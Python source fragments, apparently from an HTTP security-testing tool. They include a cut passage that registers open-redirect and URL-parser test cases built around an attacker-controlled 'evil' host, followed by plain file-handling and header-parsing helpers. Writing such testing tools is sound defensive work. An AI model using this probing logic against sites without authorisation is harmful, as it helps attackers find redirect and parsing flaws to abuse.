			# NOTE: Test open redirects using HTTP request headers with redirect IP addresses and domain names.
			self.__records(
				id      = "REDIRECTS-3",
				url     = self.__url.full.initial.domain,
				headers = test.get_host_headers(value.get_redirect_hosts(self.__url, self.__evil))
			)
			# NOTE: Test open redirects using HTTP request headers with redirect root URLs.
			self.__records(
				id      = "REDIRECTS-4",
				url     = self.__url.full.initial.domain,
				headers = test.get_root_url_headers(value.get_redirect_root_urls(self.__url, self.__evil))
			)
			# NOTE: Test open redirects using HTTP request headers with redirect full URLs.
			self.__records(
				id      = "REDIRECTS-5",
				url     = self.__url.full.initial.domain,
				headers = test.get_path_override_headers(value.get_redirect_full_urls(self.__url, self.__evil))
			)
			# NOTE: Test open redirects using HTTP request headers with redirect full URLs.
			self.__records(
				id      = "REDIRECTS-6",
				url     = self.__url.full.initial.domain,
				headers = test.get_full_url_headers(value.get_redirect_full_urls(self.__url, self.__evil))
			)
		# --------------------------------
		if self.__check_scope([general.Test.PARSERS]):
			# NOTE: Test broken URL parsers using HTTP request headers with broken IP addresses.
			self.__records(
				id      = "PARSERS-1",
				url     = self.__url.full.initial.domain,
				headers = test.get_ip_headers(value.get_broken_ips(self.__url, self.__evil))
			)
			# NOTE: Test broken URL parsers using HTTP request headers with broken IP addresses and domain names.
			self.__records(
				id      = "PARSERS-2",
				url     = self.__url.full.initial.domain,
				headers = test.get_host_override_headers(value.get_broken_hosts(self.__url, self.__evil))
			)
			# NOTE: Test broken URL parsers using HTTP request headers with broken IP addresses and domain names.
			self.__records(
				id      = "PARSERS-3",
				url     = self.__url.full.initial.domain,
				headers = test.get_host_headers(value.get_broken_hosts(self.__url, self.__evil))
			)
			# NOTE: Test broken URL parsers using HTTP request headers with broken root URLs.
			self.__records(
				id      = "PARSERS-4",
				url     = self.__url.full.initial.domain,
				headers = test.get_root_url_headers(value.get_broken_root_urls(self.__url, self.__evil))
			)
			# NOTE: Test broken URL parsers using HTTP request headers with broken full URLs.
			self.__records(
				id      = "PARSERS-5",
				url     = self.__url.full.initial.domain,
				headers = test.get_path_override_headers(value.get_broken_full_urls(self.__url, self.__evil))
			)
			# NOTE: Test broken URL parsers using HTTP request headers with broken full URLs.
			self.__records(
				id      = "PARSERS-6",
				url     = self.__url.full.initial.domain,
				headers = test.get_full_url_headers(value.get_broken_full_urls(self.__url, self.__evil))
			)



#!/usr/bin/env python3

from . import array

import os

__ENCODING = "ISO-8859-1"

def is_file(file: str):
	"""
	Returns 'True' if the 'file' exists and is a regular file.
	"""
	return os.path.isfile(file)

def validate(file: str):
	"""
	Validate a file.\n
	Success flag is 'True' if the file has a read permission and is not empty.
	"""
	success = False
	message = ""
	if not os.access(file, os.R_OK):
		message = f"\"{file}\" does not have a read permission"
	elif not os.stat(file).st_size > 0:
		message = f"\"{file}\" is empty"
	else:
		success = True
	return success, message

def read_array(file: str):
	"""
	Read a file line by line, and append the lines to a list.\n
	Whitespace will be stripped from each line, and empty lines will be removed.\n
	Returns a unique list.
	"""
	tmp = []
	with open(file, "r", encoding = __ENCODING) as stream:
		for line in stream:
			line = line.strip()
			if line:
				tmp.append(line)
	return array.unique(tmp)

def overwrite(text: str, out: str):
	"""
	Write a text to an output file.\n
	If the output file exists, prompt to overwrite it.
	"""
	confirm = "yes"
	if os.path.isfile(out):
		print(f"'{out}' already exists")
		confirm = input("Overwrite the output file (yes): ")
	if confirm.lower() in ["yes", "y"]:
		try:
			open(out, "w").write(text)
			print(f"Results have been saved to '{out}'")
		except FileNotFoundError:
			print(f"Cannot save the results to '{out}'")



#!/usr/bin/env python3

from . import general, grep

import enum, typing

class Header(enum.Enum):
	"""
	Enum containing disallowed HTTP request headers.
	"""
	USER_AGENT = "User-Agent"
	COOKIE     = "Cookie"

	@classmethod
	def all(cls):
		"""
		Get all disallowed HTTP request headers.
		"""
		return [
			cls.USER_AGENT,
			cls.COOKIE
		]

	@classmethod
	def all_lower(cls):
		"""
		Get all disallowed HTTP request headers in lowercase.
		"""
		return [entry.value.lower() for entry in cls.all()]

# ----------------------------------------

def get_key_value(header: str):
	"""
	Get a key-value pair from an HTTP header.\n
	Returns an empty key-value pair on failure.
	"""
	key = ""; value = ""
	if grep.search(header, r"^[^\:]+\:.+$"):
		key, value = header.split(":", 1)
	elif grep.search(header, r"^[^\;]+\;$"):
		key, value = header.split(";", 1)
	return key.strip(), value.strip()

def format_key_value(key: str, value: typing.Any):
	"""
	Returns a key-value pair of an HTTP header as a string.
	"""
	return f"{key}: {value}" if value else f"{key};"

def to_dict_duplicate(headers: list[str]) -> dict[str, str]:
	"""
	Convert a list of HTTP headers into a dictionary while preserving duplicate HTTP headers.
	"""
	tmp = {}
	exists = set()
	for header in headers:
		key, value = get_key_value(header)
		tmp[key if key not in exists and not exists.add(key) else general.UniqueString(key)] = value
	return tmp

# ----------------------------------------

def find(response_headers: str | dict[str, str], key: str):
	"""
	Get the first HTTP response header for the specified case-insensitive key.\n
	Returns an empty string if the specified key does not exist.
	"""
	value = ""
	if isinstance(response_headers, dict):
		key = key.lower()
		for __key, __value in response_headers.items():
			if __key.lower() == key:
				value = __value
				break
	else:
		matches = grep.find(("\n").join(response_headers.splitlines()), rf"(?<=^{key}\:).+")
		if matches:
			value = str(matches[0])
	return value
